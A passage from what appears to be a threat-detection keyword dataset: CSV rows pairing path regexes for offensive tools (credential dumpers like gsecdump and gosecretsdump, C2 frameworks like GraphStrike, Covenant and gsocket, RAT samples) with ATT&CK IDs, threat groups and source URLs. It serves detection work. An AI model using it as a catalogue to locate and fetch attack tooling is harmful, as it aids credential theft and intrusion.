"*/gosecretsdump.*",".{0,1000}\/gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7592" "*/gosecretsdump/*",".{0,1000}\/gosecretsdump\/.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7593" "*/gosecretsdump_linux*",".{0,1000}\/gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","#linux","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7594" "*/gosecretsdump_mac*",".{0,1000}\/gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7595" "*/gosecretsdump_win*",".{0,1000}\/gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","7596" "*/GoStompy.go*",".{0,1000}\/GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","7600" "*/Gotato.git*",".{0,1000}\/Gotato\.git.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","7601" "*/gotato.go*",".{0,1000}\/gotato\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","7602" "*/goWMIExec.git*",".{0,1000}\/goWMIExec\.git.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7604" "*/goWMIExec_linux_*",".{0,1000}\/goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","#linux","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7605" "*/goWMIExec_mac_*",".{0,1000}\/goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7606" "*/goWMIExec_win_*",".{0,1000}\/goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","7607" "*/goZulipC2.git*",".{0,1000}\/goZulipC2\.git.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","7608" "*/GPOBrowser.py*",".{0,1000}\/GPOBrowser\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","7609" "*/GPOddity.git*",".{0,1000}\/GPOddity\.git.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","7610" "*/GPOddity/*",".{0,1000}\/GPOddity\/.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","7611" "*/gpp_autologin.py*",".{0,1000}\/gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7612" "*/gpp_password.py*",".{0,1000}\/gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7613" "*/gpp-decrypt*",".{0,1000}\/gpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","7614" "*/gpsd-info.nse*",".{0,1000}\/gpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7615" "*/grabchrome.exe*",".{0,1000}\/grabchrome\.exe.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7616" "*/Graphpython.git*",".{0,1000}\/Graphpython\.git.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","7617" "*/Graphpython.py*",".{0,1000}\/Graphpython\.py.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","7618" "*/GraphRunner.git*",".{0,1000}\/GraphRunner\.git.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","7619" "*/GraphRunner.ps1*",".{0,1000}\/GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","7620" "*/GraphRunner-main*",".{0,1000}\/GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","7621" "*/GraphSpy.git*",".{0,1000}\/GraphSpy\.git.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","7622" "*/GraphSpy.py*",".{0,1000}\/GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","7623" 
"*/GraphStrike.cna*",".{0,1000}\/GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7624" "*/GraphStrike.git*",".{0,1000}\/GraphStrike\.git.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7625" "*/graphstrike.profile*",".{0,1000}\/graphstrike\.profile.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7626" "*/GraphStrike.py*",".{0,1000}\/GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7627" "*/GraphStrike-main/*",".{0,1000}\/GraphStrike\-main\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","7628" "*/GreameRAT.exe*",".{0,1000}\/GreameRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 
- T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7629" "*/GreatSCT/*",".{0,1000}\/GreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","7630" "*/GreatSCT/GreatSCT*",".{0,1000}\/GreatSCT\/GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GreatSCT/GreatSCT","1","0","#linux","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","7631" "*/greatsct-output*",".{0,1000}\/greatsct\-output.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","7632" "*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","7633" "*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7634" "*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7635" "*/Group3r.git*",".{0,1000}\/Group3r\.git.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","7636" "*/Group3r/releases/download/*",".{0,1000}\/Group3r\/releases\/download\/.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","7637" "*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7638" "*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7639" "*/GruntHTTP.exe*",".{0,1000}\/GruntHTTP\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","7640" 
"*/gsecdump-*.exe*",".{0,1000}\/gsecdump\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7641" "*/gsecdump.exe*",".{0,1000}\/gsecdump\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7642" "*/gs-netcat ",".{0,1000}\/gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7643" "*/gsocket-*.tar.gz*",".{0,1000}\/gsocket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7644" "*/gsocket.1*",".{0,1000}\/gsocket\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7645" "*/gsocket.git*",".{0,1000}\/gsocket\.git.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7646" "*/gsocket/releases/latest*",".{0,1000}\/gsocket\/releases\/latest.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7647" "*/gsocket_*_all.deb*",".{0,1000}\/gsocket_.{0,1000}_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7648" "*/gsocket_*_x86_64.deb*",".{0,1000}\/gsocket_.{0,1000}_x86_64\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7649" "*/gsocket_*aarch64.deb*",".{0,1000}\/gsocket_.{0,1000}aarch64\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7650" "*/gsocket_*arm.deb*",".{0,1000}\/gsocket_.{0,1000}arm\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7651" "*/gsocket_*armv6.deb*",".{0,1000}\/gsocket_.{0,1000}armv6\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7652" "*/gsocket_*armv7l.deb*",".{0,1000}\/gsocket_.{0,1000}armv7l\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7653" "*/gsocket_*i686.deb*",".{0,1000}\/gsocket_.{0,1000}i686\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7654" "*/gsocket_*mips32.deb*",".{0,1000}\/gsocket_.{0,1000}mips32\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7655" "*/gsocket_*mips64.deb*",".{0,1000}\/gsocket_.{0,1000}mips64\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7656" "*/gsocket_*mipsel.deb*",".{0,1000}\/gsocket_.{0,1000}mipsel\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7657" "*/gsocket_dso.so.*",".{0,1000}\/gsocket_dso\.so\..{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7658" "*/gsocket_latest_all.deb*",".{0,1000}\/gsocket_latest_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7659" "*/gsocket-build*",".{0,1000}\/gsocket\-build.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
